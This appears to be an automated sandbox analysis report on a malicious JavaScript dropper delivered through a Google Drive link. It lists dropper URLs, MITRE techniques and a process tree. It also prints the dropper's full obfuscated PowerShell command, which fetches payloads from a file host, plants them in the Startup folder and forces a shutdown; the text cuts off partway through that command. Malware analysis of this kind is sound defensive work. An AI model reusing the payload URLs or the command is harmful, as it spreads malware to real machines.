hxxps://drive[.]google[.]com/file/d/1G3_2_HJsgv-3XaB1c-1LiB7FCw7Y_e2G/view?usp=sharing" shash="AHgwadQR0oti/LSs1mgMNCbwWr4tIel2pzfy1I5MA5ekINAV05visyc/LzTPeM2L6HUwp3Hfak+cgiZW2PbRpwD6YLs/S/JMmUf/d+1+BcsBf4VxoSqYjQ3itlbZYgMgUPjwQ1Lfo+DbL00md6ce11JacrEw+jJ1/KbLgguscV4=

Analysis

max time kernel
193s
max time network
195s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
30-01-2025 06:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/file/d/1G3_2_HJsgv-3XaB1c-1LiB7FCw7Y_e2G/view?usp=sharing" shash="AHgwadQR0oti/LSs1mgMNCbwWr4tIel2pzfy1I5MA5ekINAV05visyc/LzTPeM2L6HUwp3Hfak+cgiZW2PbRpwD6YLs/S/JMmUf/d+1+BcsBf4VxoSqYjQ3itlbZYgMgUPjwQ1Lfo+DbL00md6ce11JacrEw+jJ1/KbLgguscV4=

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/bYrRPs5M

exe.dropper

https://files.catbox.moe/sakuuo.msu

exe.dropper

https://files.catbox.moe/6sdjc5.msu

exe.dropper

https://pastebin.com/raw/bYrRPs5M

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
126	4836	powershell.exe
128	2300	powershell.exe
129	2104	powershell.exe
130	1212	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4708	powershell.exe
4380	powershell.exe
2576	powershell.exe
1736	powershell.exe
4720	powershell.exe
1212	powershell.exe
3932	powershell.exe
4836	powershell.exe
1032	powershell.exe
2300	powershell.exe
3260	powershell.exe
2104	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
126	pastebin.com
128	pastebin.com
129	pastebin.com
130	pastebin.com
5	drive.google.com
9	drive.google.com
125	pastebin.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
1064	msedge.exe
1064	msedge.exe
1624	msedge.exe
1624	msedge.exe
4964	identity_helper.exe
4964	identity_helper.exe
1404	msedge.exe
1404	msedge.exe
4364	msedge.exe
4364	msedge.exe
4364	msedge.exe
4364	msedge.exe
3932	powershell.exe
3932	powershell.exe
3932	powershell.exe
4836	powershell.exe
4836	powershell.exe
4836	powershell.exe
4836	powershell.exe
1736	powershell.exe
1736	powershell.exe
1736	powershell.exe
1032	powershell.exe
1032	powershell.exe
1032	powershell.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
4708	powershell.exe
4708	powershell.exe
4708	powershell.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
2104	powershell.exe
2104	powershell.exe
2104	powershell.exe
2104	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
1212	powershell.exe
2576	powershell.exe
2576	powershell.exe
2576	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

description	pid	Process
Token: SeRestorePrivilege	1948	7zG.exe
Token: 35	1948	7zG.exe
Token: SeSecurityPrivilege	1948	7zG.exe
Token: SeSecurityPrivilege	1948	7zG.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1032	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	4708	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	2104	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	1212	powershell.exe
Token: SeDebugPrivilege	2576	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1948	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe
1624	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 3928	1624	msedge.exe	81
PID 1624 wrote to memory of 3928	1624	msedge.exe	81
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1096	1624	msedge.exe	82
PID 1624 wrote to memory of 1064	1624	msedge.exe	83
PID 1624 wrote to memory of 1064	1624	msedge.exe	83
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84
PID 1624 wrote to memory of 460	1624	msedge.exe	84

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.google.com/file/d/1G3_2_HJsgv-3XaB1c-1LiB7FCw7Y_e2G/view?usp=sharing" shash="AHgwadQR0oti/LSs1mgMNCbwWr4tIel2pzfy1I5MA5ekINAV05visyc/LzTPeM2L6HUwp3Hfak+cgiZW2PbRpwD6YLs/S/JMmUf/d+1+BcsBf4VxoSqYjQ3itlbZYgMgUPjwQ1Lfo+DbL00md6ce11JacrEw+jJ1/KbLgguscV4=
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff86db546f8,0x7ff86db54708,0x7ff86db54718
  2⤵
  PID:3928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:2
  2⤵
  PID:1096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2944 /prefetch:8
  2⤵
  PID:460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:4956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
  2⤵
  PID:2596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
  2⤵
  PID:4052
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  PID:1748
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:2572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
  2⤵
  PID:184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:1460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
  2⤵
  PID:3084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
  2⤵
  PID:1708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2712 /prefetch:8
  2⤵
  PID:3904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,6284728773351632349,8398865036405306785,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5868 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4364

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4788

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4708

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\F-2025-0050\" -ad -an -ai#7zMap7011:84:7zEvent28632
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\F-2025-0050\F-2025-0050.js"
1⤵
- Checks computer location settings
PID:1172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $SUopR = 'JA' + [char]66 + 'xAE4AUw' + [char]66 + 'uAEcAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAcQ' + [char]66 + 'OAFMAbg' + [char]66 + 'HACAAKQAgAHsAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAA9ACAAKA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ASQ' + [char]66 + 'PAC4AUA' + [char]66 + 'hAHQAaA' + [char]66 + 'dADoAOg' + [char]66 + 'HAGUAdA' + [char]66 + 'UAGUAbQ' + [char]66 + 'wAFAAYQ' + [char]66 + '0AGgAKAApACkAOw' + [char]66 + 'kAGUAbAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQA7ACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACAAPQAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGYAaQ' + [char]66 + 'sAGUAcwAuAGMAYQ' + [char]66 + '0AGIAbw' + [char]66 + '4AC4AbQ' + [char]66 + 'vAGUALw' + [char]66 + 'zAGEAaw' + [char]66 + '1AHUAbwAuAG0Acw' + [char]66 + '1ACcAOwAkAG0AZQ' + [char]66 + 'uAG8AcwAgAD0AIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'mAGkAbA' + [char]66 + 'lAHMALg' + [char]66 + 'jAGEAdA' + [char]66 + 'iAG8AeAAuAG0Abw' + [char]66 + 'lAC8ANg' + [char]66 + 'zAGQAag' + [char]66 + 'jADUALg' + [char]66 + 'tAHMAdQAnADsAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAA9ACAAJA' + [char]66 + 'lAG4AdgA6AFAAUg' + [char]66 + 'PAEMARQ' + [char]66 + 'TAFMATw' + [char]66 + 'SAF8AQQ' + [char]66 + 'SAEMASA' + [char]66 + 'JAFQARQ' + [char]66 + 'DAFQAVQ' + [char]66 + 'SAEUALg' + [char]66 + 'DAG8Abg' + [char]66 + '0AGEAaQ' + [char]66 + 'uAHMAKAAnADYANAAnACkAOw' + [char]66 + 'pAGYAIAAoACAAJA' + [char]66 + 'LAGgATA' + [char]66 + 'hAEsAIAApACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAkAG0AZQ' + [char]66 + 'uAG8AcwAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGYAYw' + [char]66 + '5AHoAeQAgAD0AIAAoACQAZg' + [char]66 + 'jAHkAeg' + [char]66 + '5ACkAIAA7AH0AOwAkAHQAeg' + [char]66 + '4AGQAZgAgAD0AIAAoACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAApACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ACAAOwAkAHQAeg' + [char]66 + '4AGQAZgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'GAGkAbA' + [char]66 + 'lACgAJA' + [char]66 + 'mAGMAeQ' + [char]66 + '6AHkALAAgACgAJA' + [char]66 + 'mAGIASw' + [char]66 + 'OAFkAIAArACAAJw' + [char]66 + 'cAFUAcA' + [char]66 + '3AGkAbgAuAG0Acw' + [char]66 + '1ACcAKQAgACkAIAA7ACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAPQAgACgAIAAnAEMAOg' + [char]66 + 'cAFUAcw' + [char]66 + 'lAHIAcw' + [char]66 + 'cACcAIAArACAAWw' + [char]66 + 'FAG4Adg' + [char]66 + 'pAHIAbw' + [char]66 + 'uAG0AZQ' + [char]66 + 'uAHQAXQA6ADoAVQ' + [char]66 + 'zAGUAcg' + [char]66 + 'OAGEAbQ' + [char]66 + 'lACAAKQA7ACQAYg' + [char]66 + 'KAFQAWA' + [char]66 + 'qACAAPQAgACgAIAAkAGYAYg' + [char]66 + 'LAE4AWQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwAgACkAIAA7ACAAcA' + [char]66 + 'vAHcAZQ' + [char]66 + 'yAHMAaA' + [char]66 + 'lAGwAbAAuAGUAeA' + [char]66 + 'lACAAdw' + [char]66 + '1AHMAYQAuAGUAeA' + [char]66 + 'lACAAJA' + [char]66 + 'iAEoAVA' + [char]66 + 'YAGoAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAcg' + [char]66 + 'IAFcAcg' + [char]66 + 'UACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + 